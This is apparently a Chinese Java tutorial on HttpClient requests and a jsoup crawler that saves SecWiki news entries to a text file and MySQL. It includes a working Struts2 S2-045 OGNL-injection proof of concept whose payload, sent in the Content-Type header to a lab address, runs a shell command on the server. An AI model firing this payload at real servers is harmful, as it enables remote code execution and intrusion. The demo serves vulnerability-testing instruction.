爬取SecWiki安全技术网站的技术资讯, 并保存到MySQL数据库中
<!-- 第一步: 导包 --> <dependency> <groupId>org.apache.httpcomponents</groupId> <artifactId>httpclient</artifactId> <version>4.3.1</version> </dependency>
package cn.test.requestdata;
import org.apache.http.Header;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import java.io.IOException;
/**
 * Entry point for the GET example: launches one {@code Get} worker thread.
 */
public class HttpClientGet {
    public static void main(String[] args) {
        // The worker performs the request on its own thread.
        Thread worker = new Get();
        worker.start();
    }
}
/**
 * Worker thread that sends one HTTP GET request and prints the response body.
 */
class Get extends Thread {
    // HTTP client used to send the request (default configuration).
    CloseableHttpClient httpClient = HttpClients.createDefault();

    /**
     * Sends a GET request to the fixed target URL and prints the body decoded as UTF-8.
     *
     * <p>The response is closed as soon as the body has been read, and the client is
     * closed before this method returns, so no connection is left open. I/O failures
     * are reported on standard error and do not propagate.
     */
    @Override
    public void run() {
        // Target URL
        String url = "http://192.168.174.133:8080/struts2/";
        // Request method: GET
        HttpGet httpGet = new HttpGet(url);
        // Request header: present a browser-like user agent
        httpGet.setHeader("user-agent","Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36");
        // try-with-resources releases the connection even when reading the body fails.
        try (CloseableHttpResponse response = httpClient.execute(httpGet)) {
            // The response carries status line, headers and body; only the body is used.
            String html = EntityUtils.toString(response.getEntity(), "UTF-8");
            System.out.println(html);
        } catch (IOException e) {
            e.printStackTrace();
        } finally {
            // This thread owns the client, so it releases it once the request is done.
            try {
                httpClient.close();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
}
package cn.test.requestdata;
import org.apache.http.HttpEntity;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;
import java.io.IOException;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
/**
 * Entry point for the POST example: launches one {@code Post} worker thread.
 */
public class HttpClientPost {
    public static void main(String[] args) {
        // The worker performs the request on its own thread.
        Thread worker = new Post();
        worker.start();
    }
}
/**
 * Worker thread that sends one form-encoded HTTP POST request and prints the response body.
 */
class Post extends Thread {
    // HTTP client used to execute the request (default configuration).
    CloseableHttpClient httpClient = HttpClients.createDefault();

    /**
     * Posts the form fields {@code userName} and {@code password} to the fixed target URL
     * and prints the response body decoded as UTF-8.
     *
     * <p>The form is encoded as UTF-8 so that non-Latin values survive encoding. The
     * response and the client are both closed before this method returns. I/O failures
     * are reported on standard error and do not propagate.
     */
    @Override
    public void run() {
        // Target URL
        String url = "http://192.168.174.133:8080/struts2/";
        // Request method: POST
        HttpPost httpPost = new HttpPost(url);
        try {
            // Form parameters
            List<NameValuePair> list = new ArrayList<NameValuePair>();
            list.add(new BasicNameValuePair("userName","天心"));
            list.add(new BasicNameValuePair("password", "996"));
            // Explicit charset: the single-argument constructor falls back to ISO-8859-1,
            // which cannot represent the userName value.
            HttpEntity entity = new UrlEncodedFormEntity(list, "UTF-8");
            httpPost.setEntity(entity);
            // try-with-resources releases the connection even when reading the body fails.
            try (CloseableHttpResponse response = httpClient.execute(httpPost)) {
                String html = EntityUtils.toString(response.getEntity(), "utf-8");
                System.out.println(html);
            }
        } catch (IOException e) {
            e.printStackTrace();
        } finally {
            // This thread owns the client, so it releases it once the request is done.
            try {
                httpClient.close();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
}
package cn.test.requestdata;
import org.apache.http.Header;
import org.apache.http.HttpEntity;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;
import java.io.IOException;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
/**
 * Detection proof-of-concept that sends a POST request whose Content-Type header
 * carries an OGNL expression, then prints whatever the server returns.
 *
 * NOTE(review): run this only against systems you own or are explicitly authorized
 * to test; the target below is a private lab address.
 */
public class Struts045 {
public static void main(String[] args){
HttpClientPost();
}
/**
 * Builds the request (payload in the Content-Type header, two form fields in the body),
 * executes it and prints the response body decoded as UTF-8.
 * IOExceptions are printed to standard error and not propagated.
 * NOTE(review): neither the response nor the client is closed here.
 */
public static void HttpClientPost(){
String url = "http://192.168.174.133:8080/struts2/";
// Variant: print an echo marker (disabled)
//String payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))." + "(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('exist Struts045')).(#o.close())}";
// Variant: probe the web application path (disabled)
//String payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#outstr.println(#req.getRealPath(\"/\"))).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}";
// Variant: command execution (the one currently active)
String payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}";
// Variant: file upload (placeholder, not implemented)
//String payload ="";
// HTTP client used to execute the request
CloseableHttpClient httpClient= HttpClients.createDefault();
// Request method: POST
HttpPost httpPost=new HttpPost(url);
// The payload is carried in the Content-Type header rather than in the body.
httpPost.setHeader("Content-Type", payload);
httpPost.setHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36");
try {
// Form parameters sent as the request body
List<NameValuePair> list = new ArrayList<NameValuePair>();
list.add(new BasicNameValuePair("userName","天心"));
list.add(new BasicNameValuePair("password", "996"));
HttpEntity entity = new UrlEncodedFormEntity(list);
httpPost.setEntity(entity);
// Execute the request
CloseableHttpResponse response = httpClient.execute(httpPost);
// Read and print the response body
String html= EntityUtils.toString(response.getEntity(),"utf-8");
System.out.println(html);
} catch (IOException e) {
e.printStackTrace();
}
}
}
命令执行检测效果如下:
<!-- 第一步: 导包 --> <dependency> <groupId>org.jsoup</groupId> <artifactId>jsoup</artifactId> <version>1.10.2</version> </dependency>
使用jsoup解析页面之前, 需要先获取到Document对象。本次使用基于CSS的选择器来解析HTML文档。
package cn.test.spider1;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;
import java.io.*;
/**
 * Crawls the first ten news-list pages of sec-wiki.com and appends the time, title
 * and link of every listed entry to a local text file.
 */
public class SpiderSecwikitxt {

    /**
     * Fetches pages 1 through 10 of the news list, one after another.
     *
     * @param args unused
     * @throws IOException if a page cannot be fetched or the output file cannot be written
     * @throws InterruptedException declared for compatibility; not thrown by this code
     */
    public static void main(String[] args) throws IOException, InterruptedException {
        // Base URL; the page number is appended to it.
        String urll="https://www.sec-wiki.com/news?News_page=";
        for(int i=1;i<11;i++){
            String url=urll+i;
            getUrl(url);
        }
    }

    /**
     * Downloads one list page, extracts its table rows and appends one line per row
     * ({@code time title href}) to {@code D://spider//spider.txt}.
     *
     * <p>The output file is opened once per page and always closed, and nothing is
     * opened when the page yields no rows to write.
     *
     * @param url address of the list page to fetch
     * @throws IOException if the request fails or the file cannot be written
     */
    private static void getUrl(String url) throws IOException {
        String html;
        // Client and response are closed as soon as the body has been read.
        try (CloseableHttpClient httpClient = HttpClients.createDefault();
             CloseableHttpResponse response = httpClient.execute(new HttpGet(url))) {
            html = EntityUtils.toString(response.getEntity(),"utf-8");
        }

        // Parse the page and select every row of the listing table.
        Document document = Jsoup.parse(html);
        Elements element = document.select("[class=items table]").select("tr");

        // The original loop bound is kept: the last <tr> is not processed
        // (presumably a non-data row — confirm against the page markup).
        int rowCount = element.size() - 1;
        if (rowCount <= 0) {
            // Nothing to write; avoids creating the file or closing a null stream.
            return;
        }

        // One append-mode stream per page instead of one per row.
        try (FileOutputStream fos = new FileOutputStream("D://spider//spider.txt",true)) {
            for (int i = 0; i < rowCount; i++) {
                Element row = element.get(i);
                // First column: time
                String time = row.select("td:first-child").text();
                System.out.print(time+" ");
                // Second column: title
                String title = row.select("td:nth-child(2)").text();
                System.out.print(title+" ");
                // Link of the entry
                String href = row.select("td>a").attr("href");
                System.out.println(href+" ");
                // Bytes are written in the platform default charset, as before.
                fos.write(time.getBytes());
                fos.write(" ".getBytes());
                fos.write(title.getBytes());
                fos.write(" ".getBytes());
                fos.write(href.getBytes());
                fos.write("\r\n".getBytes());
            }
        }
    }
}
txt效果如下
package cn.test.spider1;
import cn.test.mapper.EventDao;
import cn.test.pojo.Event;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.select.Elements;
import java.io.IOException;
/**
 * Crawls the first ten news-list pages of sec-wiki.com and stores the time, title
 * and link of every listed entry through {@code EventDao}.
 */
public class SpiderSecwikimysql {
    // DAO used to persist each extracted event.
    private static EventDao eventDao = new EventDao();

    /**
     * Fetches pages 1 through 10 of the news list, one after another.
     *
     * @param args unused
     * @throws IOException if a page cannot be fetched
     */
    public static void main(String[] args) throws IOException {
        // Base URL; the page number is appended to it.
        String urll="https://www.sec-wiki.com/news?News_page=";
        for(int i=1;i<11;i++){
            String url=urll+i;
            getUrl(url);
        }
    }

    /**
     * Downloads one list page, extracts its table rows and saves one {@code Event}
     * per row. The HTTP client and response are closed once the body has been read,
     * so no connection is left open per page.
     *
     * @param url address of the list page to fetch
     * @throws IOException if the request fails
     */
    private static void getUrl(String url) throws IOException {
        String html;
        // try-with-resources releases both the response and the client.
        try (CloseableHttpClient httpClient = HttpClients.createDefault();
             CloseableHttpResponse response = httpClient.execute(new HttpGet(url))) {
            html = EntityUtils.toString(response.getEntity(),"utf-8");
        }

        // Parse the page and select every row of the listing table.
        Document document = Jsoup.parse(html);
        Elements element = document.select("[class=items table]").select("tr");

        // The original loop bound is kept: the last <tr> is not processed
        // (presumably a non-data row — confirm against the page markup).
        for (int i = 0; i < element.size() - 1; i++) {
            Event event = new Event();
            // First column: time
            String time = element.get(i).select("td:first-child").text();
            System.out.print(time+" ");
            event.setTime(time);
            // Second column: title
            String title = element.get(i).select("td:nth-child(2)").text();
            System.out.print(title+" ");
            event.setTitle(title);
            // Link of the entry
            String href = element.get(i).select("td>a").attr("href");
            System.out.println(href);
            event.setUrl(href);
            // Persist the event
            eventDao.addEvent(event);
        }
    }
}
通过EventDao类保存到mysql数据库中
package cn.test.mapper;
import cn.test.pojo.Event;
import com.mchange.v2.c3p0.ComboPooledDataSource;
import org.springframework.jdbc.core.JdbcTemplate;
import java.beans.PropertyVetoException;
/**
 * Data-access object for crawled events. It is itself a {@code JdbcTemplate}
 * whose data source is a c3p0 pool configured in the constructor.
 */
public class EventDao extends JdbcTemplate {

    /**
     * Configures the pooled data source (driver, JDBC URL, user, password) and
     * installs it on this template. A {@code PropertyVetoException} raised while
     * configuring is printed and the data source is installed regardless.
     */
    public EventDao() {
        ComboPooledDataSource pool = new ComboPooledDataSource();
        try {
            // The four mandatory connection settings: driver, URL, user, password.
            pool.setDriverClass("com.mysql.jdbc.Driver");
            pool.setJdbcUrl("jdbc:mysql://localhost:3306/spider?characterEncoding=UTF-8");
            pool.setUser("root");
            pool.setPassword("root");
        } catch (PropertyVetoException vetoed) {
            vetoed.printStackTrace();
        }
        // Hand the pool to the JdbcTemplate base class.
        super.setDataSource(pool);
    }

    /**
     * Inserts one event row with the values time, title and url, in that order.
     *
     * @param event the event whose fields are written
     */
    public void addEvent(Event event) {
        Object[] values = {event.getTime(), event.getTitle(), event.getUrl()};
        update("insert into spidersecwiki values(?,?,?)", values);
    }
}
定义Event类
package cn.test.pojo;
/**
 * Plain data holder for one crawled entry: its time, title and link.
 */
public class Event {
    /** Time of the event. */
    private String time;
    /** Title of the event. */
    private String title;
    /** URL of the event. */
    private String url;

    /** Creates an event with all fields unset. */
    public Event() {
    }

    /**
     * Creates an event with every field populated.
     *
     * @param time  time of the event
     * @param title title of the event
     * @param url   URL of the event
     */
    public Event(String time, String title, String url) {
        this.time = time;
        this.title = title;
        this.url = url;
    }

    /** @return the time of the event */
    public String getTime() {
        return this.time;
    }

    /** @param time the time of the event */
    public void setTime(String time) {
        this.time = time;
    }

    /** @return the title of the event */
    public String getTitle() {
        return this.title;
    }

    /** @param title the title of the event */
    public void setTitle(String title) {
        this.title = title;
    }

    /** @return the URL of the event */
    public String getUrl() {
        return this.url;
    }

    /** @param url the URL of the event */
    public void setUrl(String url) {
        this.url = url;
    }

    /**
     * @return a text form listing all three fields, each value wrapped in single quotes
     */
    @Override
    public String toString() {
        StringBuilder text = new StringBuilder("Event{");
        text.append("time='").append(time).append('\'');
        text.append(", title='").append(title).append('\'');
        text.append(", url='").append(url).append('\'');
        text.append('}');
        return text.toString();
    }
}
存入mysql数据库中如下: